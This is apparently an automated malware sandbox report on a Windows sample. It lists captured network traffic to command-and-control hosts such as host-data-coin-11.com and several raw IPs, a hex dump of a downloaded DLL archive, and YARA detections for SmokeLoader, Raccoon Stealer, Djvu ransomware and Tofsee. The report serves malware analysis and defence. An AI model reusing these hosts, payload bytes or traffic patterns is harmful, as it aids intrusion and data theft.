                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 6e 46 8c 15 d8 ea 66 e1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevnFfdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 53 5e 98 3d a0 e4 66 b1 7b 1b 1b a4 fc 0d 0a 30 0d 0a 0d 0a Data Ascii: 31I:82OTevS^=f{0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:43:35 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:43:38 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 04 48 c6 35 d0 d8 66 ea 25 5e 1b ee a8 88 1c bf 55 c7 17 9e ab 0d 0a 30 0d 0a 0d 0a Data Ascii: 39I:82OTevH5f%^U0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df e1 fb 43 a2 04 ee 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%C0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3b 47 a3 f7 c2 aa b9 01 ac 52 cc 77 f8 00 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU;GRw0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 41 6f c6 15 eb f8 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevAofdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pggcfgsws.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49854 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.102.49.170:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49870 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49875 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.4:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.4:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49890 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49900 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.V91yW08J6p.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.adiicvb.6115a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.1.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.1.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.V91yW08J6p.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.adiicvb.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.737039163.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.738316434.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788360446.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907355017.0000000002090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.808518584.00000000021B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.722834578.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.907548459.00000000020C1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.788330206.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
                      Source: V91yW08J6p.exe, 00000000.00000002.674814337.000000000071A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected Djvu RansomwareShow sources
                      Source: Yara matchFile source: 00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.915798638.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.924493030.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.918689335.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000001.929538052.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.947898819.0000000002330000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.922458766.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.qxoxlxqh.exe.d70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.6902.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.6902.exe.600000.0.raw.unpack, type: UNPACKEDPE
